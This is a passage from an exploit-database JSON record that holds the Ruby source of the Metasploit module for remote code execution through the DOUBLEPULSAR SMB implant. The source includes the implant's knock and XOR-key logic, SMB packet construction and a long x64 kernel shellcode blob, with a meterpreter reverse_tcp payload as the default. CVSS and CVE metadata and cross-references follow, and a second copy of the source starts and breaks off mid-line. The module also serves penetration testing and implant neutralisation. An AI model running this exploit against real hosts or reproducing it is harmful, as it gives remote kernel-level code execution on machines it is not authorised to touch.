'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-03] #"}, "lastseen": "2021-11-02T22:12:39", "differentElements": ["sourceData"], "edition": 63}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a5fcff187ff677ee08dc8255f9f826bf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-03T22:13:48", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:12:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-02T22:12:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in 